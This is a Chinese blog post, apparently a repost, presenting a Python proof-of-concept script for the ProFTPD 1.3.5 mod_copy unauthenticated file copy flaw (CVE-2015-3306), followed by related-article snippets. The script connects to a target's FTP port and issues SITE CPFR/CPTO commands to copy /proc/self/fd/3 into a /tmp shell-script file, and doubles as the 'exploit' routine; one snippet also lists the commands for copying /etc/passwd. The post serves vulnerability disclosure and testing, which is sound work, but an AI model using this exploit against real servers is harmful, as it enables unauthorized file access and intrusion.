ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞

最新推荐文章于 2024-06-23 21:55:05 发布
最新推荐文章于 2024-06-23 21:55:05 发布
阅读量639 收藏
点赞数
文章标签: python

poc如下:

#!/usr/bin/env python
# coding=utf-8

"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""

import random
import telnetlib

from baseframe import BaseFrame
from utils.http import http


class MyPoc(BaseFrame):
    poc_info = {
        # poc相关信息
        'poc': {
            'id': 'poc-2015-0088',
            'name': 'ProFTPD <=1.3.5 mod_copy 未授权文件复制漏洞(CVE-2015-3306) POC',
            'author': 'evi1m0',
            'create_date': '2015-04-20',
        },
        # 协议相关信息
        'protocol': {
            'name': 'ftp',
            'port': [21],
            'layer4_protocol': ['tcp'],
        },
        # 漏洞相关信息
        'vul': {
            'app_name': 'ProFTPD',
            'vul_version': ['<=1.3.5'],
            'type': 'Other',
            'tag': ['ProFTPD漏洞', 'mod_copy漏洞', 'CVE-2015-3306'],
            'desc': '''
                    This candidate has been reserved by an organization or individual that will use it when announcing
                    a new security problem. When the candidate has been publicized, the details for this candidate will be
                    provided.
                    ''',
            'references': ['http://bugs.proftpd.org/show_bug.cgi?id=4169',
            ],
        },
    }

    @classmethod
    def verify(cls, args):
        ip = http.transform_target_ip(http.normalize_url(args['options']['target']))
        if args['options']['verbose']:
            print '[*] {} Connecting...'.format(ip)
        tn = telnetlib.Telnet(ip, port=21, timeout=15)
        tn.write('site help\r\n')
        tn.write('quit\n')
        status = tn.read_all()
        if 'CPTO' in status and 'CPFR' in status:
            if args['options']['verbose']:
                print '[*] Find CPTO & CPFR'
            tn = telnetlib.Telnet(ip, port=21, timeout=15)
            filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000)
            tn.write('site cpto evi1m0@beebeeto\n')
            tn.write('site cpfr /proc/self/fd/3\n')
            tn.write('site cpto %s\n'%filename_tmp)
            tn.write('quit\n')
            result = tn.read_all()
            if 'Copy successful' in result:
                args['success'] = True
                args['poc_ret']['vul_target'] = ip
                args['poc_ret']['filename'] = filename_tmp
        return args


    exploit = verify


if __name__ == '__main__':
    from pprint import pprint

    mp = MyPoc()
    pprint(mp.run())

weixin_33738578
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tryhackme - Kenobi (考点:ProFTPD 1.3.5 & nfs &环境变量提权)
冬萍子癸水
05-25 1059
1 扫描 21这个写了版本号ProFTPD 1.3.5,这就是可利用的漏洞,可以进行拷贝复制敏感文件。 参考靶机symfonos2和joy 22可能有ssh登录 80进web信息搜集 139 445smb进去找敏感信息 2049开了nfs考虑挂载 PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2
ProFTPD远程命令执行漏洞或影响100多万台服务器
NOSEC2019的博客
07-23 1264
ProFTPD是一个开源,跨平台的FTP服务软件,支持大多数类Unix系统和Windows,是Unix平台下最流行的FTP服务软件之一,且同时支持Pure-FTPD和vsftpd。 而最近,ProFTPD被曝出任意文件复制漏洞,可导致超过一百万多台安装了ProFTPD的服务器受到远程命令执行和信息泄漏攻击。 所有版本在1.3.5b及其以下的ProFTPD软件都会受到该漏洞影响,攻击者只要成功利用...
proftpd的mod_copy模块授权调用利用记录
HRay's blog
06-15 1365
文章来源自《安全参考》第30期,略有改动 影响版本: proftpd-1.3.4---proftpd-1.3.5 1.执行命令 nc x.x.x.x 21 2.执行site cpfr /etc/passwd可以授权状态复制文件 3.执行site cpto /tmp/test可将之前复制的/etc/passwd粘贴到/tmp/test 高级用法: s
cve-2015-3306-proftpd-vulfocus
最新发布
c0529的博客
06-23 420
proftp是用于搭建基于ftp协议的应用软件ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何经身份验证的客户端都可以利用这些命令将文件文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
ProFTPD 截至1.3.5b 任意文件复制 CVE-2019-12815
-
01-12 218
截至1.3.5b的ProFTPD中mod_copy中存在任意文件复制漏洞
怎么验证proftpd安装成功_ProFTPD远程命令执行漏洞或影响100多万台服务器
weixin_39579483的博客
11-24 254
ProFTPD是一个开源,跨平台的FTP服务软件,支持大多数类Unix系统和Windows,是Unix平台下最流行的FTP服务软件之一,且同时支持Pure-FTPD和vsftpd。而最近,ProFTPD被曝出任意文件复制漏洞,可导致超过一百万多台安装了ProFTPD的服务器受到远程命令执行和信息泄漏攻击。所有版本在1.3.5b及其以下的ProFTPD软件都会受到该漏洞影响,攻击者只要成功利用该漏洞...
proftpd-mod_dynamic_include:proftpd模块
04-27
mod_dynamic_include.c 描述 在登录阶段动态加载proftpd配置 用法 /etc/proftpd.conf LoadModule mod_dynamic_include.c DynamicIncludePath /etc/proftpd/%u.conf 格式规格 %u user name ( sent by 'USER' command...
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/...
FTP协议编程.rar_FTP 下载_ftp协议_文件服务器
09-23
常见的开源文件服务器软件有vsftpd、ProFTPD等。在设置文件服务器时,需要配置防火墙规则、认证机制、权限控制以及日志记录等,以确保安全性和可用性。 标签中提到的"ftp_下载"是指使用FTP协议进行文件下载,"ftp...
proftpd-1.3.5
06-12
`proftpd`支持UNIX文件权限模型,也可以通过`<Limit>`指令限制特定操作。 **6. SSL/TLS安全连接** 为了增强数据传输的安全性,`proftpd-1.3.5`支持SSL/TLS加密。通过配置证书和启用`TLSRequired`指令,可以强制...
FTP.rar_FTP服务器_FTP服务器程序_ftp server service_ftp 服务器_ftp文件服务器
09-22
FTP服务器中,"FTP服务器程序"指的是像ProFTPD、vsftpd、FileZilla Server等这样的软件,它们提供了一个稳定的平台,使得用户可以通过FTP协议进行文件的上传、下载以及目录的浏览。FTP服务器服务,如"ftp_server_...
propane:利用 proftpd 中的任意文件写入错误 (CVE-2015-3306) 尝试执行代码
07-22
丙烷 利用 ProFTPD 的 mod_copy 模块 (CVE-2015-3306) 中的任意文件写入错误并尝试执行代码
cve-2015-3306复现
Yale的博客
04-02 3245
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何经身份验证的客户端都可以利用这些命令将文件文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
Metasploitable3渗透测试实战
温柔小薛的博客
02-17 4247
这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二 目录1综述2.渗透过程2.1渗透路径说明2.1.1全端口扫描/服务发现2.1.2目录扫描2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。2.1.4二、sql注入2.1.5三、phpmyadmin远程php代码执行2.1.6四、文件上传漏
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2
Aluxian_的博客
04-11 1461
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度适中2.smb共享smbmap枚举(工具得使用)ssh私钥登入3.文件复制漏洞利用希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
渗透测试-应用协议安全Rsync&SSH&RDP&FTP
告白的博客
04-11 3369
在渗透测试中的信息收集的环节,对于端口的探针是一个重点关注的地方,不同的端口会有代表的不同的协议传输的服务,而对于这些一些常见的服务端口,我们需要对其进行的渗透测试做一个简要的汇总
内网渗透命令浅谈
weixin_38116292的博客
05-11 467
即使命令也是区分大小写的(windows不区分,linux区分) windows和linux基本命令的对比 cd 打开目录 mkdir 创建目录 rmdir 删除目录 dir和ls,列文件 move和mv 移动文件 del和rm 删除文件 copy和cp 拷贝文件 type和cat 查看文件 echo 打印字符串 echo %cd% 和pwd 打印当前工作目录 findstr和grep 查找字符串 ===== kali也可以使用powershell 直接使...
proftpd 漏洞详情 是否存在vsftpd漏洞
06-08
ProFTPD 曾经存在多个安全漏洞,包括远程执行代码漏洞CVE-2019-12815)、拒绝服务漏洞CVE-2015-3306)、授权访问漏洞CVE-2014-3529)等。这些漏洞可能导致攻击者远程执行任意代码、拒绝服务攻击、授权访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值